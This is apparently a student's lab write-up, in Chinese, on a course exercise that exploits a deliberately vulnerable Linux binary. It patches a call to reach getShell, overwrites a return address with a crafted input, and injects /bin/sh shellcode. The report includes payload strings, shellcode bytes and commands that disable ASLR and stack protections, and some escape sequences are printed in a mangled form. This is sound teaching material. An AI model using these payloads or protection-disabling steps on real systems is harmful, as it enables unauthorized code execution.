2019-2020-3 20175103王伟泽《网络对抗技术》Exp1 PC平台逆向破解
一、实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
三个实践内容如下:
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 注入一个自己制作的shellcode并运行这段shellcode。
这几种思路,基本代表现实情况中的攻击目标:
- 运行原本不可访问的代码片段
- 强行修改程序执行流
- 注入运行任意代码。
二、基础知识
管道符|、输入重定向>、 追加输入>>以及常用的linux文件操作。
实验内说明。
常用汇编语言、机器语言、EIP寄存器、指令地址。
- NOP汇编指令的机器码是“90”
- JNE汇编指令的机器码是“75”
- JE 汇编指令的机器码是“74”
- JMP汇编指令的机器码是“eb”
- CMP汇编指令的机器码是“39”
掌握反汇编与十六进制编程器
反汇编指令 objdump -d (文件名)| more
其中
objdump -d将代码段反汇编
-d英文全称是disassembling,反汇编选项
|管道符,将上一命令的输出作为下一命令的输入。
more使文件以一页一页的形式显示,,更方便使用者逐页阅读
十六进制编辑器
学会使用gdb、vi操作文件或进程。
进入vim编辑器后按esc后输入 %!xxd 将显示模式切换为16进制
编辑完成后按esc后输入 %!xxd -r 将转换为原格式
按esc后输入:wq保存退出
gdb于实验中说明。
三、实验内容
实验一:手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
源文件中main函数调用函数为foo函数,我们直接修改该文件内容,使其调用函数改变,从而激活getshell,最简单粗暴的方式。
1.载入pwn1,使用cp指令生成待操作文件pwn1.cp。
2.使用objdump -d pwn1.cp | more对文件pwn1.cp进行反汇编并查看。其中第一列为内存地址,第二列为机器指令,第三列为对应汇编指令。
3.因为所修改内容位于主函数,通过翻页查找到主函数所在地。通过图片可以看到,主函数main中通过call 8048491<foo>调用函数foo,为了使其改为调用getshell函数,我们需要对其进行修改。该指令对应机器指令为e8 d7,其中e8是call指令所对应的机器指令,d7 ff ff ff对应的则是foo函数的内存起始地址的补码,(该数值产生与call指令的工作原理有关,当执行call指令时,call指令后的数据将与EIP中的内容相加,此处即将计算“d7ffffff+EIP”为内存地址的指令。而在此时EIP中存储的是下一条指令的内存地址,即80484ba+d7ffffff,就是函数foo所在的内存地址8048491)因此需要对d7ffffff进行修改。
4.经过计算器计算804847d(getsheel起始地址)-80484ba(EIP值)算出补码为ffffffc3,用该数值替换原先d7ffffff即可。
5.接下来开始编辑可执行文件pwn1.cp。首先使用vim编译器打开pwn1.cp,发现是乱码显示。
6.此处需要使用vim的%!xxd指令将文件转换为十六进制显示。显示完成后输入/e8 d7查找要修改的地方(此处e8和d7之间需要加空格,否则无法正确查找到)。
7.根据前后文确定好修改位置,i进入编辑模式将d7改为c3(此处因为该文件存储为小端存储,在实验中我曾以为错以为FFFFFFC3大端转为小端存储时应是3CFFFFFF,后发现结果错误,才了解学到了大端转小端是按照两个字节一组转的,组内顺序不变。)
8.将文件重新转为原本的表达方式,使用%!xxd -r转回(如不转回原格式直接保存,运行该文件会出错)。重新对修改后文件进行反汇编验证。
9.验证成功后,执行,出现文字符,实验一成功。
实验二:利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
此处用到缓冲区溢出攻击,关键是利用数据溢出覆盖EIP,改写文件进程走向,从而执行我们想执行的内容。最重要的就是确定EIP的位置。
1.实验前准备,要下载gdb,使用指令apt-get install gdb下载。
2.使用cp生成pwn1的复制pwn1.cp1。反汇编查看结构,从该指令8d 45 e4 lea -0x1c(%ebp),%eax发现在读入字符串时,该堆栈分配了0x1c的空间大小,即28个字节,如果读入的字符串够大,就可覆盖到EIP进而造成缓冲区溢出攻击。main中的call指令调用foo,并且在堆栈上压上返回地址80484ba。
3.下面我们要确定输入的字符串会覆盖返回地址的位置,我们首先构建一个字符串1111111122222222333333334444444412345678作为测试,使用指令gdb对pwn1.cp1进行调试,输入r运行程序,输入构造好的测试字符串,发现返回地址为34333231,而这正是1234的ASCII的值,说明返回地址在第33到36位间。
4.由之前的反汇编可得知getshell的内存地址为0804847d,因为之前测试中1234对应ASCII为0x34333231,因此应把要覆盖返回地址的值设计成x7dx84x04x08,即攻击字符串为11111111222222223333333344444444/x7d/x84/x04/x08。因为我们无法直接通过键盘输入十六进制,这时候就需要先把该字符串使用输入重定向>装入文件,再将文件中的内容通过cat读出并使用管道符|作为程序的输入。使用perl -e 'print"11111111222222223333333344444444x7dx84x04x08x0a"' >20175103创建好文件20175103后使用xxd十六进制显示检查一下文件内容是否正确,指令中x0a是回车。
5.输入(cat 20175103;cat)|./pwn1.cp1成功得到shell。
实验三:注入一个自己制作的shellcode并运行这段shellcode。
该种思路需要用到Shellcode,shellcode就是一段机器指令(code),通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。和前面的getshell功能一致,唯一的区别在于,getshell是可执行程序里已有的,只是用户不可见,而shellcode是自己编写的,可以实现任何功能。
攻击思路:首先将我们设计的shellcode存入缓存区,得到shellcode的内存地址后,使用和第二次实验一样的方法,只不过把原来getshell的内存地址改为shellcode的内存地址,这样就可以运行我们的shellcode了。因此,shellcode的长度一定要小于系统分配缓存区大小,即28字节。
构筑要注入的payload,在linux中有两种方法:
- retaddr+nop+shellcode(一般来说使用RNS的形式)
- nop+shellcode+retaddr(约束shellcode的大小)
选择哪种需要根据具体情况,一般说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边。
1.实验前准备:为了成功完成实验,我们需要关闭一些功能:包括
apt-get install execstack安装攻击所用execstack。execstack -s pwn1设置堆栈可执行,否则shellcode输入缓冲区将无法执行,进而不能进行该攻击。execstack -q pwn1查询文件的堆栈是否可执行,查看之前命令是否生效。more /proc/sys/kernel/randomize_va_space查询地址随机化是否关闭,如果地址随机化关闭,那么shellcode的内存地址将无法确定,进而无法跳转到shellcode,无法执行攻击。echo "0" > /proc/sys/kernel/randomize_va_space关闭地址随机化。more /proc/sys/kernel/randomize_va_space再次检查地址随机化是否关闭。
2.首先构造一个注入代码,并写入文件:perl -e 'print "A" x 32;print "perl -e 'print "x90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x4x3x2x1x00"' > 20175103shellcode,其中x90是空指令,加空指令的目的就是形成一片滑行区,到时候寻找该段指令时只要看到该指令便能够找到,减小寻找shellcode内存地址的难度。(其中结尾不可以加x0a,因为我们需要用gdb调试进行,如果输入回车程序就直接报错了)使用(cat 20175103shellcode; cat ) | ./pwn3.cp在一个终端输入该文件内容。
3.打开另一个终端,使用ps -ef|grep pwn3.cp指令来寻找当前运行进程号。找到该进程号为1320。
4.启动gdb调试该进程,输入attach 1320调试进程,后用disassemble foo因为直接运行会爆错,我们通加入断点来查看报错内容。使用break *0x080484ae指令在ret处加入断点。之后在第一个终端按下回车,在第二个终端使用c查看错误信息。使用info r esp查看esp寄存器内信息。使用x/16x 0xffffd33c指令查看周围内容。每次延申28个字节来查找shellcode的位置,通过x90x90x90x90确定位置最后找到,为0xffffd340。
5.已知shellcode内存地址,构造payload为perl -e 'print "A" x 32;print "x20xd3xffxffx90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > 20175103shellcode,并将其通过之前的方法作为pwn3.cp的输入,成功调出shell。
四、实验总结
错误总结
- 文本转化为16进制后忘记转回,导致无法运行。
- 错以为FFFFFFC8大端转为小端存储时应是8CFFFFFF,后发现结果错误,才了解学到了大端转小端是按照两个字节一组转的,组内顺序不变。
- 搜索e8d7时中间必须有空格,否则搜索不到。
- 第三次实验中的实验前准备是实时性的,在关闭后重新打开需要重新设置。
心得
-
漏洞是什么
在我看来,漏洞是一种非人愿的缺陷,我们设计出来的系统总是想百分百安全,但是总会在无论是硬件、软件或者协议上多多少少有着一些缺陷,这些缺陷可能不影响正常的使用,但如果有人不怀好意,针对这些漏洞去想办法,就可能能够达到自己的不好目的,如窃取秘密信息、破坏系统、装后门、非法访问系统等。如在本次实验中我们所利用的便是程序编程本身的漏洞,即缓冲区溢出漏洞。漏洞,尤其是未被安全人员发现的零日漏洞,可能会对系统或者程序造成巨大的破坏,并且造成大量的经济损失。 -
实验后感想
做完本次实验,回想一下过程,因为我是第一次使用Linux,第一次亲手操刀一次安全攻击,第一次发布博客,以及对之前知识的忘记,种种原因导致我本次实验前前后后共用时一周。但是这一切都非常值得。在这期间所做的努力,不仅使我对实验本身缓冲区溢出攻击的内容更加了解,同时,对如何通过向他人学习从而让自己掌握的方法也更加得心应手。此外,对于发布博客、分享自己实验的过程心得也更加娴熟;并且在实践中捡回了之前学过的理论知识。非常期待下一次实验的到来!